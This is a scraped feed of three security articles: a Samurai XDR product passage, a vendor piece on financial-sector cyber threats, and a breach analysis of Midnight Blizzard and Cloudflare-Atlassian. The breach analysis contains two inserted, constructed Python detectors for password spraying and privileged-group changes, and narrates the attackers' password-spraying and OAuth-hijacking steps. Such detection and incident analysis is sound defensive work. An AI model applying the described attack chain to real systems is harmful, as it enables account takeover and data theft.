What SMBs need is the ability to bring alerting from all of their IT infrastructure and applications into a single tool, which can analyze all of an organization’s telemetry, apply threat intelligence, and then provide a simple interface that acts as a single pane of glass for managing alerting, performing investigations and responding to threats. This is where XDR provides a solution that combines the key components of a traditional SecOps toolchain in a single cloud-hosted application, which can be delivered affordably. This is the second key area where NTTSH has turned its focus towards SMBs by focusing the development of its Samurai XDR product on the needs and budgets of SMBs while still delivering the functionality that large enterprises have become accustomed to. While GTIC’s research provides the intelligence needed to understand and detect the threats facing modern organizations, Samurai XDR makes GTIC’s work accessible and actionable even for organizations that lack dedicated SecOps resources. It is crucial to remember that while threat intelligence is essential to be able to detect threats, every organization needs tools in order to apply it.

A brief journey through Samurai XDR

From the start, Samurai XDR is designed to be easy to use and, most importantly, to be accessible to all IT staff, not only to security analysts. The starting point of all workflows in Samurai XDR is the alerts dashboard. This is where the system presents security alerts which have been prioritized based on severity and confidence.

Figure 3: Samurai XDR Alerts Dashboard.

The alerts dashboard brings together alerts from all of the technologies used by the organization into a single prioritized view, with a focus on providing an intuitive interface that can be used by most IT staff, not only by specialist security analysts.

Once the user has decided that an alert warrants further investigation, the Investigations view provides a similarly simple and intuitive interface for managing the lifecycle of an investigation of a potential security incident.

Once events and alerts are processed, they are stored in Samurai XDR’s data lake. The data lake provides the ability for users to query and analyze all of the events ingested into Samurai XDR, going back up to one full year. This makes it possible to interrogate a full year’s historical data for purposes such as threat hunting – allowing Samurai XDR users to perform detailed analyses of historical events for any signs of threats that may have been dwelling for longer periods of time. Querying the events in the data lake is made possible by Samurai XDR’s Advanced Query function, which allows users to search the data lake both graphically and using Microsoft’s Kusto Query Language (KQL).

Integrations

Integrations provide the mechanism to ingest telemetry (such as logs) from your IT infrastructure and applications into Samurai XDR. NTTSH has focused on bringing together the right mix of capabilities to ingest telemetry from both on-premises infrastructure and cloud services, mirroring the kind of hybrid IT environment that has become typical for even most SMBs today. Some examples of integrations currently available include:

  • Cloud: Azure Management Plane and Microsoft 365 (coming soon), Google Workspace (coming soon)
  • Endpoint Detection and Response: Microsoft Defender for Endpoint, VMware Carbon Black and CrowdStrike Falcon Insight
  • Next-Generation Firewalls: Cisco Secure Firewall (ASA and Firepower Threat Defense), Fortinet FortiGate, and Palo Alto Networks NGFW.

Over the coming months, NTTSH will be busy adding more integrations, including but not limited to Meraki, Bitdefender, Sophos, Zoom, Malwarebytes, OneLogin, Okta, Zscaler, AWS, and many more!

Making it Easy

A key area of focus for NTTSH in the development of Samurai XDR has been that of making it easy to use and easy to afford. For example, the configuration of integrations is supported by simple “point and click” workflows. For infrastructure that provides logs via syslog, all that is needed is to point the log source at Samurai XDR’s secure syslog collector, and Samurai XDR will do the work of detecting the kind of device that is sending logs. Naturally, it’s the same for cloud integrations. Samurai XDR keeps the steps to a minimum and guides the user through interactive steps and access to knowledge-base articles.

Samurai XDR also follows a simple pricing model – based solely on the number of endpoints that the customer has, removing the need to try to estimate the data volumes of the telemetry that will be ingested into the platform. Standard pricing for 50 endpoints or more is only $3.33 per endpoint per month, and for smaller customers, there is a Starter Pack for up to 25 endpoints, which is priced at $750 for a year.

To make it easy to try out Samurai XDR, NTTSH is providing all new customers with a free 30-day trial, making it possible to experience all of its functionality without any commitments, giving even the smallest SMBs a risk-free route to building an advanced SecOps capability.

Cybersecurity Tactics FinServ Institutions Can Bank On in 2024 (http://www.indiavpn.org/2024/02/14/cybersecurity-tactics-finserv-institutions-can-bank-on-in-2024/, Wed, 14 Feb 2024 12:55:58 +0000)

The landscape of cybersecurity in financial services is undergoing a rapid transformation. Cybercriminals are exploiting advanced technologies and methodologies, making traditional security measures obsolete. The challenges are compounded for community banks that must safeguard sensitive financial data against the same level of sophisticated threats as larger institutions, but often with more limited resources.

The FinServ Threat Landscape

Recent trends show an alarming increase in sophisticated cyber-attacks. Cybercriminals now deploy advanced techniques like deepfake technology and AI-powered attacks, making it increasingly difficult for banks to differentiate between legitimate and malicious activities. These developments necessitate a shift towards more sophisticated and adaptive cybersecurity measures. Take these industry statistics, for example.

  • Financial firms report 703 cyberattack attempts per week. [1]
  • On average, 270 attacks (entailing unauthorized access of data, applications, networks, or devices) occurred in financial services, an increase of 31% compared with the prior year. [2]
  • Financial services businesses take an average of 233 days to detect and contain a data breach. [3]
  • 43% of senior bank executives don’t believe their bank is adequately equipped to protect customer data, privacy, and assets in the event of a cyberattack. [4]
  • The average data breach cost in financial services is $5.72 million per incident. [5]

State-sponsored cyberattacks also pose a unique threat to the financial sector. These attacks are often highly sophisticated and well-funded, aimed at destabilizing financial systems or stealing sensitive economic information. Community banks must be prepared to defend against these high-level threats, which require a different approach than conventional cybercriminal activities.

Similarly, in recent times, there has been a concerning trend where major service providers catering to small and medium-sized banks, such as FIS, Fiserv, and Jack Henry, have become prime targets for cyber-attacks. Targeting these service providers allows threat actors to widen their net and make their attempts more efficient, as compromising a single service provider can potentially provide access to multiple small banks. This underscores the critical importance of strong vendor management governance.

Proactive measures can be taken to overcome the threats facing the FinServ industry. Companies like ArmorPoint provide complimentary Cybersecurity Workshops where they have seasoned cybersecurity experts identify specific security gaps and produce recommendations to mitigate those risks.

Top 5 FinServ Cybersecurity Challenges and How to Overcome Them

1. Advanced Cloud Security Strategies

Cloud computing, with its numerous benefits of scalability, flexibility, and cost-effectiveness, is increasingly being adopted by financial institutions. However, this shift introduces specific security concerns that can be challenging to manage. The complexity of cloud security stems from the need to protect data across diverse and dynamic environments. In the cloud, data often moves across various services and geographies, making traditional perimeter-based security approaches less effective. Additionally, the shared responsibility model in cloud computing can lead to ambiguity in security roles and responsibilities between the cloud service provider and the bank.

To address these challenges, banks must adopt advanced cloud security strategies. This involves implementing comprehensive data encryption to protect data at rest and in transit, and robust identity and access management systems to control who can access what data and under what conditions. Zero-trust security models, where trust is never assumed and verification is required from everyone trying to access resources in the network, are increasingly vital. Understanding the nuances of different cloud environments—public, private, and hybrid—is also key to tailoring security measures effectively.

2. Ransomware: Beyond Basic Defense

Ransomware attacks in the financial sector have become increasingly sophisticated, leveraging tactics like “Ransomware as a Service” (RaaS) to target institutions. The evolving nature of ransomware, combined with the high value of financial data, makes these institutions particularly vulnerable. Traditional defense strategies are often inadequate in the face of such advanced threats, which can bypass standard security measures and encrypt critical data, causing operational disruptions and financial losses.

Banks need to implement a multi-layered defense strategy against ransomware. This includes advanced threat intelligence systems that can provide real-time insights into emerging threats and vulnerabilities. Regular security audits are crucial to identify and address potential vulnerabilities in the bank’s cybersecurity infrastructure. Additionally, proactive threat hunting teams can play a critical role in identifying and neutralizing threats before they materialize, providing an additional layer of defense against ransomware attacks.

3. Comprehensive Vendor Risk Management

Financial institutions increasingly rely on third-party vendors for a range of services, from cloud computing to customer relationship management. Each vendor relationship introduces potential cybersecurity risks, as vendors may have access to or manage sensitive bank data. Managing these risks is complicated by the differing security postures and practices of various vendors, making it challenging to ensure consistent security standards across all third-party relationships.

Effective vendor risk management goes beyond initial security assessments and requires continuous monitoring and evaluation of vendor security practices. Regular security audits of vendors are essential to ensure they adhere to agreed-upon security standards and practices. Integrating vendor risk management into the bank’s overall cybersecurity strategy ensures a unified approach to security, reducing the likelihood of vendor-related security breaches.

4. Regulatory Compliance: Navigating a Complex Landscape

The regulatory landscape for cybersecurity in the financial sector is intricate and constantly evolving. Banks are required to comply with a wide range of international, national, and regional regulations, each with its own set of requirements and penalties for non-compliance. Navigating this complex landscape is challenging, as banks must continually adapt their cybersecurity strategies to meet these evolving requirements.

To effectively navigate this landscape, community banks must develop a deep understanding of relevant regulations, such as the GLBA, PCI DSS, SOX, and more. This involves establishing a dedicated compliance team, or even utilizing a virtual Chief Information Security Officer (vCISO), responsible for staying abreast of regulatory changes and ensuring that the bank’s cybersecurity practices align with these requirements. Regular training and awareness programs for all staff are also crucial to ensure widespread understanding and adherence to compliance requirements.

5. Bridging the Cybersecurity Talent Gap

The cybersecurity talent gap poses a significant challenge for financial institutions. The rapidly evolving nature of cyber threats requires skilled professionals who are up to date with the latest technologies and strategies. However, there is a shortage of such professionals in the market, making it difficult for banks to recruit and retain the talent needed to effectively manage their cybersecurity risks.

Banks must adopt creative solutions to bridge this talent gap. Developing internal training programs can help upskill existing staff, making them capable of handling more complex cybersecurity tasks. Collaborating with educational institutions to develop tailored cybersecurity curriculums can help create a pipeline of skilled professionals. Additionally, leveraging AI and automation for routine security tasks can free up human resources for more complex and strategic cybersecurity challenges, optimizing the use of available talent.

Furthermore, another viable strategy for addressing the talent gap is outsourcing. Financial institutions can consider outsourcing security operations talent, partnering with specialized firms to provide expert cybersecurity services. This approach allows banks to access a pool of seasoned professionals who can monitor, detect, and respond to security threats effectively. Additionally, outsourcing executive-level insights, such as a virtual Chief Information Security Officer (vCISO), can provide strategic guidance and governance to strengthen the bank’s overall cybersecurity posture. By outsourcing specific talent needs, banks can bridge the talent gap more effectively while maintaining a strong focus on cybersecurity excellence.

ArmorPoint has recently released a security maturity self-assessment. Take the 15-question quiz to determine the gaps in your security posture.

Three Steps to Implement a Robust Cybersecurity Framework

An integrated approach to cybersecurity is imperative for effectively managing these diverse challenges. This involves creating a cohesive framework that combines advanced technology solutions, thorough policies and procedures, regular risk assessments, continuous monitoring, and proactive incident response planning.

Step 1: Strategic Alignment and Planning

The cornerstone of a successful cybersecurity program lies in its strategic alignment and planning. This critical first step involves setting clear cybersecurity goals that are closely aligned with the business objectives of the organization. Integration of security controls into the organizational strategy is essential, ensuring every business aspect is underpinned by robust security measures. An effective strategy also includes the creation of a risk prioritization framework, which is instrumental in identifying and focusing on the most critical threats. Furthermore, the development of a security architecture, tailored to the specific needs and risk profile of the organization, is crucial. This architecture needs to be dynamic, evolving in tandem with the changing landscape of cybersecurity threats and business requirements.

Step 2: Risk-Centric Action and Deployment

The second phase of developing a cybersecurity program is centered around risk-centric action and deployment. This involves establishing an efficient team structure, one that is dedicated to the meticulous implementation of the cybersecurity strategy. A key component of this phase is the deployment of the necessary tools and technologies that bring the strategic plan to life. Translating high-level strategies into actionable, practical steps is essential for effective execution. Strategic allocation of resources, especially in areas with higher perceived risks, ensures that critical aspects of the network are prioritized and reinforced. Moreover, the importance of continuous monitoring and management of security systems cannot be overstated, as they are vital for maintaining the efficacy of security measures and for addressing emergent threats swiftly.

Step 3: Continuous Recalibration and Optimization

In the final phase, the focus shifts to the continuous recalibration and optimization of the cybersecurity program. This phase demands maintaining accountability at all organizational levels and enhancing incident response capabilities to ensure swift and effective reactions to threats. Cultivating a culture that is aware of cybersecurity, through the education of employees and stakeholders about security best practices and risks, forms the bedrock of this phase. Regular evaluations and transparent communication of the program’s effectiveness to key stakeholders are crucial for fostering an environment of continuous improvement. The cybersecurity strategies should be under constant review and refinement based on ongoing assessments. This adaptive approach ensures that cybersecurity measures remain both effective and relevant, aligning with the ever-evolving business environment and the shifting landscape of cyber threats.

Preparing for Emerging Trends and Future Threats

The future of cybersecurity in the financial sector is likely to be shaped by emerging technologies and evolving threat landscapes.

AI and Machine Learning in Cybersecurity

The integration of AI and machine learning in cybersecurity tools is set to revolutionize threat detection and response. These technologies can analyze vast amounts of data to identify patterns indicative of cyber threats, offering a level of speed and efficiency unattainable by human analysts alone.

The Role of Blockchain in Enhancing Security

Blockchain technology has the potential to offer enhanced security features for financial transactions and data integrity. Its decentralized and immutable nature makes it an attractive option for securing transaction records and preventing fraud.

Cyber threats are constantly evolving; community banks must stay vigilant and proactive in their cybersecurity efforts. Embracing comprehensive and integrated cybersecurity strategies, focusing on cyber resilience, and preparing for future technological advancements are key to safeguarding against the diverse and sophisticated threats in the cyber landscape. By staying ahead of these challenges, financial institutions can ensure the security and continuity of their operations, maintaining the trust and confidence of their customers.

For more information about how you can enhance the security of your regional financial institution, explore ArmorPoint’s solutions and experience the power of a unified approach to cybersecurity program management.

Resources

[1] https://blog.checkpoint.com/security/check-point-research-cyber-attacks-increased-50-year-over-year/
[2] https://www.accenture.com/us-en/insights/security/state-cybersecurity
[3] https://info.varonis.com/hubfs/docs/research_reports/2021-Financial-Data-Risk-Report.pdf?hsLang=en
[4] https://kpmg.com/us/en/articles/2022/cybersecurity.html
[5] https://www.ibm.com/reports/data-breach

Midnight Blizzard and Cloudflare-Atlassian Cybersecurity Incidents: What to Know (http://www.indiavpn.org/2024/02/13/midnight-blizzard-and-cloudflare-atlassian-cybersecurity-incidents-what-to-know/, Tue, 13 Feb 2024 12:18:05 +0000)

Feb 13, 2024 | The Hacker News | SaaS Security / Data Breach

The Midnight Blizzard and Cloudflare-Atlassian cybersecurity incidents raised alarms about the vulnerabilities inherent in major SaaS platforms. These incidents illustrate the stakes involved in SaaS breaches — safeguarding the integrity of SaaS apps and their sensitive data is critical but is not easy. Common threat vectors such as sophisticated spear-phishing, misconfigurations and vulnerabilities in third-party app integrations demonstrate the complex security challenges facing IT systems.

In the case of Midnight Blizzard, password spraying against a test environment was the initial attack vector. For Cloudflare-Atlassian, threat actors initiated the attack via compromised OAuth tokens from a prior breach at Okta, a SaaS identity security provider.

What Exactly Happened?

Microsoft Midnight Blizzard Breach

Microsoft was targeted by the Russian “Midnight Blizzard” hackers (also known as Nobelium, APT29, or Cozy Bear) who are linked to the SVR, the Kremlin’s foreign intelligence service unit.

In the Microsoft breach, the threat actors:

  1. Used a password spray strategy on a legacy account and historic test accounts that did not have multi-factor authentication (MFA) enabled. According to Microsoft, the threat actors “[used] a low number of attempts to evade detection and avoid account blocks based on the volume of failures.”
  2. Leveraged the compromised legacy account as an initial entry point to then hijack a legacy test OAuth app. This legacy OAuth app had high-level permissions to access Microsoft’s corporate environment.
  3. Created malicious OAuth apps by exploiting the legacy OAuth app’s permissions. Because the threat actors controlled the legacy OAuth app, they could maintain access to the applications even if they lost access to the initially compromised account.
  4. Granted admin Exchange permissions and admin credentials to themselves.
  5. Escalated privileges from OAuth to a new user, which they controlled.
  6. Consented to the malicious OAuth applications using their newly created user account.
  7. Escalated the legacy application’s access further by granting it full access to M365 Exchange Online mailboxes. With this access, Midnight Blizzard could view M365 email accounts belonging to senior staff members and exfiltrate corporate emails and attachments.

Figure: Recreation of illustration by Amitai Cohen.
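The detection point in step 1 above, as an added example that is not Microsoft’s or the article’s code: a per-account lockout counts failures on one account, so a spray that spends one or two guesses on each of many accounts never trips it, whereas correlating failures by source across accounts does catch it. The log format, account names and sign-in lines are constructed.

```python
"""Spotting a low-and-slow password spray by correlating failures across
accounts per source, rather than counting failures per account. Added
example; the log schema, account names and sign-in lines are constructed."""
from collections import Counter, defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone

# Constructed sign-in records (timestamp,account,source_ip,result). One source
# spends at most two guesses on each of nine accounts and eventually succeeds
# on a legacy service account; a real user mistypes a password twice.
SAMPLE_LOG = """\
2024-01-10T02:00:05Z,test-acct-01,203.0.113.7,failure
2024-01-10T02:04:12Z,test-acct-02,203.0.113.7,failure
2024-01-10T02:09:48Z,test-acct-03,203.0.113.7,failure
2024-01-10T02:15:30Z,test-acct-04,203.0.113.7,failure
2024-01-10T02:21:02Z,test-acct-05,203.0.113.7,failure
2024-01-10T02:26:40Z,test-acct-06,203.0.113.7,failure
2024-01-10T02:32:15Z,test-acct-07,203.0.113.7,failure
2024-01-10T02:38:51Z,test-acct-08,203.0.113.7,failure
2024-01-10T02:44:09Z,legacy-svc-01,203.0.113.7,failure
2024-01-10T02:50:33Z,test-acct-01,203.0.113.7,failure
2024-01-10T02:56:07Z,legacy-svc-01,203.0.113.7,success
2024-01-10T08:12:00Z,jsmith,198.51.100.4,failure
2024-01-10T08:12:20Z,jsmith,198.51.100.4,failure
2024-01-10T08:12:41Z,jsmith,198.51.100.4,success
"""


@dataclass(frozen=True)
class SignIn:
    ts: datetime
    account: str
    source: str
    ok: bool


def parse_log(text: str) -> list[SignIn]:
    """Parse the constructed CSV-style log into SignIn records."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, account, source, result = line.split(",")
        when = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
        events.append(SignIn(when, account, source, result == "success"))
    return events


def per_account_lockouts(events: list[SignIn], lockout: int = 10) -> set[str]:
    """Accounts a volume-of-failures lockout would block; a spray stays below it."""
    failures = Counter(e.account for e in events if not e.ok)
    return {account for account, n in failures.items() if n >= lockout}


def detect_spray(events, *, window=timedelta(hours=24), min_accounts=8, max_per_account=3):
    """Flag sources that fail against many distinct accounts inside `window`
    while keeping every account's failure count at or below `max_per_account`."""
    by_source = defaultdict(list)
    for e in sorted(events, key=lambda e: e.ts):
        by_source[e.source].append(e)

    findings = {}
    for source, evs in by_source.items():
        fails = [e for e in evs if not e.ok]
        in_window, start, most_distinct = Counter(), 0, 0
        for e in fails:                        # sliding window over failures
            in_window[e.account] += 1
            while e.ts - fails[start].ts > window:
                old = fails[start].account
                in_window[old] -= 1
                if in_window[old] == 0:
                    del in_window[old]
                start += 1
            most_distinct = max(most_distinct, len(in_window))
        per_account = Counter(e.account for e in fails)
        max_failures = max(per_account.values(), default=0)
        if most_distinct >= min_accounts and max_failures <= max_per_account:
            failed = set()
            compromised = []  # accounts that later succeeded from this source
            for e in evs:
                if not e.ok:
                    failed.add(e.account)
                elif e.account in failed and e.account not in compromised:
                    compromised.append(e.account)
            findings[source] = {
                "distinct_accounts": most_distinct,
                "max_failures_per_account": max_failures,
                "success_after_failure": compromised,
            }
    return findings


if __name__ == "__main__":
    evs = parse_log(SAMPLE_LOG)
    print("per-account lockouts:", per_account_lockouts(evs) or "none")
    for src, finding in detect_spray(evs).items():
        print("spray suspected from", src, finding)
```

The success on legacy-svc-01 after failures from the spraying source is the record worth triaging first; the legitimate user at 198.51.100.4 fails only against one account and is not flagged.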

Cloudflare-Atlassian Breach

On Thanksgiving Day, November 23, 2023, Cloudflare detected that its Atlassian systems had also been compromised in a nation-state attack.

  1. The intrusion began on November 15, 2023, using compromised credentials that had not been rotated after a previous breach at Okta in October 2023.
  2. Attackers accessed Cloudflare’s internal wiki and bug database, enabling them to view 120 code repositories in Cloudflare’s Atlassian instance.
  3. 76 source code repositories related to key operational technologies were potentially exfiltrated.
  4. Cloudflare detected the threat actor on November 23 because the threat actor connected a Smartsheet service account to an admin group in Atlassian.
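The detection in step 4, a non-human identity being added to an admin group, is the kind of audit-log rule a defender can write without knowing the attacker's other activity. The snippet below is an added example, not code from the article, Cloudflare or Atlassian; the JSON event shape, group names and the service-account naming convention are constructed assumptions.

```python
"""Flag additions of non-human identities to privileged groups in an
Atlassian-style audit log (added example with constructed events)."""
import json
import re

# Assumed privileged group names for the tenant being monitored.
PRIVILEGED_GROUPS = {"site-admins", "jira-administrators", "confluence-administrators"}
# Assumed convention: integration/service accounts carry an svc- prefix
# or a vendor/integration tag in their name.
SERVICE_ACCOUNT_RE = re.compile(r"^svc-|\b(smartsheet|bot|integration)\b", re.I)

# Constructed audit events, one JSON object per line.
AUDIT_LOG = "\n".join(json.dumps(e) for e in [
    {"ts": "2023-11-23T09:12:00Z", "action": "group_member_added", "actor": "jdoe",
     "member": "smartsheet-integration", "group": "site-admins"},
    {"ts": "2023-11-23T09:15:00Z", "action": "group_member_added", "actor": "jdoe",
     "member": "asmith", "group": "site-admins"},
    {"ts": "2023-11-23T09:20:00Z", "action": "group_member_added", "actor": "asmith",
     "member": "svc-ci-runner", "group": "developers"},
    {"ts": "2023-11-23T09:25:00Z", "action": "page_viewed", "actor": "asmith",
     "page": "wiki/123"},
])


def is_service_account(name):
    """True when the account name matches the assumed service-account convention."""
    return bool(SERVICE_ACCOUNT_RE.search(name))


def detect_privileged_group_changes(log_text):
    """Return one finding per addition to a privileged group. Non-human members
    are rated critical: service accounts typically lack MFA and an accountable
    human owner, so an attacker adding one gains durable admin access."""
    findings = []
    for line in log_text.splitlines():
        e = json.loads(line)
        if e.get("action") != "group_member_added" or e["group"] not in PRIVILEGED_GROUPS:
            continue
        severity = "critical" if is_service_account(e["member"]) else "high"
        findings.append({"ts": e["ts"], "actor": e["actor"], "member": e["member"],
                         "group": e["group"], "severity": severity})
    return findings


if __name__ == "__main__":
    for f in detect_privileged_group_changes(AUDIT_LOG):
        print(f)
```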

Threat Actors Increasingly Target SaaS

These breaches are part of a broader pattern of nation-state actors targeting SaaS service providers, for purposes including but not limited to espionage and intelligence gathering. Midnight Blizzard previously engaged in significant cyber operations, including the 2021 SolarWinds attack.

These incidents underscore the importance of continuous monitoring of your SaaS environments and the ongoing risk posed by sophisticated cyber adversaries targeting critical infrastructure and operational tech stacks. They also highlight significant vulnerabilities related to SaaS identity management and the necessity for stringent 3rd-party app risk management practices.

Attackers use common tactics, techniques and procedures (TTPs) to breach SaaS providers through the following kill chain:

  1. Initial Access: Password spraying and OAuth app hijacking
  2. Persistence: Impersonating an admin and creating additional OAuth apps
  3. Defense Evasion: Abusing highly privileged OAuth apps and accounts without MFA
  4. Lateral Movement: Broadening the compromise to connected apps
  5. Data Exfiltration: Pulling privileged and sensitive data out of the apps

Breaking the SaaS Kill Chain

One effective way to break the kill chain early is with continuous monitoring, granular policy enforcement, and proactive lifecycle management over your SaaS environments. A SaaS Security Posture Management (SSPM) platform like AppOmni can help with detecting and alerting on:

  • Initial Access: Out-of-the-box rules to detect credential compromise, including password spraying, brute force attacks, and unenforced MFA policies
  • Persistence: Scan and identify OAuth permissions and detect OAuth hijacking
  • Defense Evasion: Access policy checks, detection of newly created identity providers (IdPs), and detection of permission changes
  • Lateral Movement: Monitor logins and privileged access, detect toxic combinations, and understand the blast radius of a potentially compromised account

Note: This expertly contributed article is written by Beverly Nevalga, AppOmni.
